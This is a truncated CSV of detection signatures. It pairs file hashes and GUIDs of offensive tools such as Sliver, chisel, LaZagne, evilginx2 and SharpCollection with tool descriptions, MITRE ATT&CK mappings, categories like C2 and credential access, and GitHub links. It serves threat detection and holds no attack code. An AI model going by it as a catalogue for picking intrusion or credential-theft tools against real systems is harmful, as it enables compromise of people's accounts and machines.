"*26953f6a9ae961392ed1484e9c7ace1211f5f962*",".{0,1000}26953f6a9ae961392ed1484e9c7ace1211f5f962.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*269ede3b8c442b06d71872f817438e42d9184d58598e11163ff7227c2fe7513e*",".{0,1000}269ede3b8c442b06d71872f817438e42d9184d58598e11163ff7227c2fe7513e.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*26c6bb7444c17775d6d8ade749c26de554949030dabb6b04b73d69fc5cb10a03*",".{0,1000}26c6bb7444c17775d6d8ade749c26de554949030dabb6b04b73d69fc5cb10a03.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*26e18c8672146105fd4aed794f8d2305c635117eaea1de3e30b8f91473449b86*",".{0,1000}26e18c8672146105fd4aed794f8d2305c635117eaea1de3e30b8f91473449b86.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*26e511920655fd8129d9d192f9ab2801a23c379bd4690bc1d71b5b94a9e99310*",".{0,1000}26e511920655fd8129d9d192f9ab2801a23c379bd4690bc1d71b5b94a9e99310.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*26ea3ae0e97214aa81bdb686d78a7ac4f30debec364a682992ec767fcc45fbc1*",".{0,1000}26ea3ae0e97214aa81bdb686d78a7ac4f30debec364a682992ec767fcc45fbc1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*26edf5820094951dd18e20e86b1151d7113f1e17b64f1d3817d4995885559850*",".{0,1000}26edf5820094951dd18e20e86b1151d7113f1e17b64f1d3817d4995885559850.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "*26f5c3b1de7bc524883c2f5620ac07e5bed58bc8149a9d1ecafa47d586a5693a*",".{0,1000}26f5c3b1de7bc524883c2f5620ac07e5bed58bc8149a9d1ecafa47d586a5693a.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*270a5bef7babe4f56bdb59cb9af2b506d019e33b1d9399f42f361bf5655007b1*",".{0,1000}270a5bef7babe4f56bdb59cb9af2b506d019e33b1d9399f42f361bf5655007b1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*2711dda772bc1073c031d6044b5fe5eddc6943420ebd7e214e0b5e60adcd89d6*",".{0,1000}2711dda772bc1073c031d6044b5fe5eddc6943420ebd7e214e0b5e60adcd89d6.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*274F19EC-7CBA-4FC7-80E6-BB41C1FE6728*",".{0,1000}274F19EC\-7CBA\-4FC7\-80E6\-BB41C1FE6728.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/DragonCastle","1","0","N/A","10","3","291","34","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z" "*276920b603e0c97637aa451452128bdfa855a7144d71fff6849db6f078b6f4dd*",".{0,1000}276920b603e0c97637aa451452128bdfa855a7144d71fff6849db6f078b6f4dd.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*2779330e5c98c950e2a6f60c24efed1824ed30deb5862399f3e3da8a0c7fca92*",".{0,1000}2779330e5c98c950e2a6f60c24efed1824ed30deb5862399f3e3da8a0c7fca92.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*277a6480b44c253c13a117b1c62717c7ec7f0053a0f69f57c9a4c9c5f9283d5d*",".{0,1000}277a6480b44c253c13a117b1c62717c7ec7f0053a0f69f57c9a4c9c5f9283d5d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*2796d1c48d81be1ec426e9c09cbffede41df1a6e4fdb337f999b6a62d5e05b91*",".{0,1000}2796d1c48d81be1ec426e9c09cbffede41df1a6e4fdb337f999b6a62d5e05b91.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*27c9fbfb654f5b01c554dd9883ec3764c17a56bdc34a701ebd5ae8f2a8fb074a*",".{0,1000}27c9fbfb654f5b01c554dd9883ec3764c17a56bdc34a701ebd5ae8f2a8fb074a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*27E42E24-9F76-44E2-B1D6-82F68D5C4466*",".{0,1000}27E42E24\-9F76\-44E2\-B1D6\-82F68D5C4466.{0,1000}","offensive_tool_keyword","POC","Local Privilege Escalation from Admin to Kernel vulnerability on Windows 10 and Windows 11 operating systems with HVCI enabled.","T1055.011 - T1548.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/hakaioffsec/CVE-2024-21338","1","0","N/A","9","3","207","48","2024-04-16T21:00:14Z","2024-04-13T05:53:02Z" "*27e71eebac244f803d825159fe3b1971c9bfb169*",".{0,1000}27e71eebac244f803d825159fe3b1971c9bfb169.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*27F85701-FD37-4D18-A107-20E914F8E779*",".{0,1000}27F85701\-FD37\-4D18\-A107\-20E914F8E779.{0,1000}","offensive_tool_keyword","SharpEventPersist","Persistence by writing/reading shellcode from Event Log","T1055 - T1070.001 - T1547.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/improsec/SharpEventPersist","1","0","N/A","10","10","360","53","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z" "*284aac919a7582ec6ec1d6c71656c8177c56c1b8734834f66bc17b6d59e74b3c*",".{0,1000}284aac919a7582ec6ec1d6c71656c8177c56c1b8734834f66bc17b6d59e74b3c.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*285ee27ec825b9a981a36594658a7943eba63fe0b4237f0110cc57729fbf3b76*",".{0,1000}285ee27ec825b9a981a36594658a7943eba63fe0b4237f0110cc57729fbf3b76.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*286b57ee049f0d59eac77af0171bbe4d21c5e2e6ea89a0b1847c5b1fea2a9cb0*",".{0,1000}286b57ee049f0d59eac77af0171bbe4d21c5e2e6ea89a0b1847c5b1fea2a9cb0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*287f0bded23d895ed013d7d66f062560b983f1ed8881d59e0ab7e9374bd76c73*",".{0,1000}287f0bded23d895ed013d7d66f062560b983f1ed8881d59e0ab7e9374bd76c73.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*28d2ed9659825ef2b0d27409423ead074c9fb88f28b2186a79bf0f849beee0f1*",".{0,1000}28d2ed9659825ef2b0d27409423ead074c9fb88f28b2186a79bf0f849beee0f1.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*28dd3615a9603eb17b828c09dbc2d7eb66ff096389c76b383076bda48ee146b2*",".{0,1000}28dd3615a9603eb17b828c09dbc2d7eb66ff096389c76b383076bda48ee146b2.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*28F9E001-67E0-4200-B120-3021596689E9*",".{0,1000}28F9E001\-67E0\-4200\-B120\-3021596689E9.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*29036ee321d9b71ca990840cc14527ea83a24b968d0443b155a18c388f667244*",".{0,1000}29036ee321d9b71ca990840cc14527ea83a24b968d0443b155a18c388f667244.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*291e64d8729dd0c25a58e3ed6b377e519c3cdbfa962ee88b15f950e1449363f5*",".{0,1000}291e64d8729dd0c25a58e3ed6b377e519c3cdbfa962ee88b15f950e1449363f5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*292a7cd013a3291a7d1b0004c6da3ce863dcca353f77935b385e97649eac39d4*",".{0,1000}292a7cd013a3291a7d1b0004c6da3ce863dcca353f77935b385e97649eac39d4.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*293425d211b70219ee0ca753b3fcd56b44c369db44d9a7509614d31505b7e0e4*",".{0,1000}293425d211b70219ee0ca753b3fcd56b44c369db44d9a7509614d31505b7e0e4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*29446C11-A1A5-47F6-B418-0D699C6C3339*",".{0,1000}29446C11\-A1A5\-47F6\-B418\-0D699C6C3339.{0,1000}","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","0","N/A","10","10","122","34","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z" "*2944dbfc-8a1e-4759-a8a2-e4568950601d*",".{0,1000}2944dbfc\-8a1e\-4759\-a8a2\-e4568950601d.{0,1000}","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","0","N/A","7","3","220","38","2024-04-12T21:42:47Z","2020-02-18T12:22:50Z" "*295850b32709c33d6cf6719301a9a26b29294f6edda200320e6869ff660915ba*",".{0,1000}295850b32709c33d6cf6719301a9a26b29294f6edda200320e6869ff660915ba.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*29601a1a4939f36c5d6995124862ce5c3c7e2a64b230fd9f1c04f0f52558b5ad*",".{0,1000}29601a1a4939f36c5d6995124862ce5c3c7e2a64b230fd9f1c04f0f52558b5ad.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*2963C954-7B1E-47F5-B4FA-2FC1F0D56AEA*",".{0,1000}2963C954\-7B1E\-47F5\-B4FA\-2FC1F0D56AEA.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","425","94","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "*2963C954-7B1E-47F5-B4FA-2FC1F0D56AEA*",".{0,1000}2963C954\-7B1E\-47F5\-B4FA\-2FC1F0D56AEA.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","425","94","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "*298047e6ce299b73ea411a8ed2d67484db6c8c276a299403e0b9766cc9079456*",".{0,1000}298047e6ce299b73ea411a8ed2d67484db6c8c276a299403e0b9766cc9079456.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*29a507e37ad10b3ed522b8a524fa2d8f99978f42f16bffb9872d855c53345ca9*",".{0,1000}29a507e37ad10b3ed522b8a524fa2d8f99978f42f16bffb9872d855c53345ca9.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*29b1014789a969ec7aafc64bd17de1483775e2199de791b622718bb11be69729*",".{0,1000}29b1014789a969ec7aafc64bd17de1483775e2199de791b622718bb11be69729.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*29CBBC24-363F-42D7-B018-5EF068BA8777*",".{0,1000}29CBBC24\-363F\-42D7\-B018\-5EF068BA8777.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","N/A","8","4","317","34","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z" "*29CFAA16-9277-4EFB-9E91-A7D11225160B*",".{0,1000}29CFAA16\-9277\-4EFB\-9E91\-A7D11225160B.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","0","N/A","10","2","125","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z" "*29d30b556932d0657f14a0b290ec79d23f88d8454ca27151c8348ab7e4be9657*",".{0,1000}29d30b556932d0657f14a0b290ec79d23f88d8454ca27151c8348ab7e4be9657.{0,1000}","offensive_tool_keyword","SharpHose","Asynchronous Password Spraying Tool in C# for Windows Environments","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/ustayready/SharpHose","1","0","N/A","10","4","301","63","2023-12-19T21:06:47Z","2020-05-01T22:10:49Z" "*2a0d512c0fbacaa2029dd11e588342e80bd47927a0fa7535c75714aed2404232*",".{0,1000}2a0d512c0fbacaa2029dd11e588342e80bd47927a0fa7535c75714aed2404232.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*2a1482c944f5e27e23b23040a60c2dcebe263d1b3d071fbbea363707306733a6*",".{0,1000}2a1482c944f5e27e23b23040a60c2dcebe263d1b3d071fbbea363707306733a6.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*2a3035797a103e527b1645cb90fccf165b76deea5b1526d80f66e32f5082e0d0*",".{0,1000}2a3035797a103e527b1645cb90fccf165b76deea5b1526d80f66e32f5082e0d0.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*2a306de4565a13893b191df6e8d43b7570c0e3a3d9aa841d6d65cd843f66d220*",".{0,1000}2a306de4565a13893b191df6e8d43b7570c0e3a3d9aa841d6d65cd843f66d220.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - 